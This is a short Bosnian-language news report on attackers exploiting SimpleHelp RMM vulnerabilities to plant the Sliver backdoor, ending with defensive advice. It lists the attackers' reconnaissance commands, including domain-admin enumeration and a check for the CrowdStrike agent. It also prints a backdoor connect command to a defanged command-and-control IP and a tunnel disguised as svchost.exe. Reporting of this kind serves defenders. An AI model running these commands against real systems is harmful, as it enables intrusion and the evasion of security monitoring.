Hakeri iskorištavaju propuste SimpleHelp-a za postavljanje malicioznog softvera na sisteme

Hakeri su iskorištavali ranjivosti SimpleHelp alata za daljinsko upravljanje i nadgledanje (RMM) za postavljanje malicioznog softvera, uključujući Sliver backdoor, na narušene sisteme.

Ovaj napad naglašava važnost održavanja softvera ažurnim i implementacije robusnih sigurnosnih mjera za sprječavanje takvih eksploatacija.

Napad počinje tako što se haker povezuje na krajnju tačku preko ranjivog SimpleHelp RMM klijenta, poznatog kao JWrapper-Remote Access.

U jednom slučaju, veza je napravljena sa IP adrese 194.76.227[.]171 , koja se nalazi u Estoniji i hostuje SimpleHelp Server na portu 80.

Istraživači iz kompanije Field Effect otkrili su da nakon što se poveže, haker izvršava niz naredbi za otkrivanje kako bi prikupio detalje o sistemu, korisničke naloge i informacije o mreži.

Ove naredbe uključuju:-

• ipconfig /all
• sc query
• schtasks
• driverquery
• nltest /dclist:
• nltest /domain_trusts
• net share
• net use
• tasklist
• findstr CSFalcon
• quser
• net group "domain admins" /domain
• hostname
• ping <DC_Hostname>

Napadači koriste Sliver backdoor, alat za post-eksploataciju napisan u Go-u, koji pruža mogućnosti za ubacivanje procesa, manipulisanje usluga, izvršavanje naredbi i manipulaciju sistemom datoteka. Backdoor je konfigurisan da se poveže na IP adresu 45.9.148[.]136 na portu 443 koristeći naredbu:

agent.exe -connect 45.9.148[.]136:443 -ignore-cert

Bočno kretanje i dodatna korisna opterećenja

Osim postavljanja Sliver backdoor-a, napadači su također instalirali tunel koji je raspršen cloud-om, maskirajući ga kao legitimni Windows svchost.exe, kako bi uspostavili sigurnu, šifrovanu vezu za dalje maliciozne aktivnosti. Ovo je urađeno pomoću naredbe:

c:\Windows\svchost.exe svchost.exe service install (redacted Base64 encoded token)

slijedi:

c:\Windows\svchost.exe tunnel run --token (redacted Base64 encoded token)

Organizacije koje koriste SimpleHelp RMM mogu se zaštititi od ovih napada tako što će SimpleHelp i sve alate za daljinski pristup ažurirati.

Ne samo da čak i jedan može ograničiti udaljeni pristup pouzdanim IP rasponima s višefaktorskom autentifikacijom, nadgledati mrežni promet i zapisnike za maliciozne veze i redovno pregledavati administrativne račune za neovlaštene dodatke.

Poduzimanjem ovih koraka, organizacije mogu značajno smanjiti svoju ranjivost na takve napade i zaštititi svoje sisteme od maliciozne eksploatacije.

Izvor: CyberSecurityNews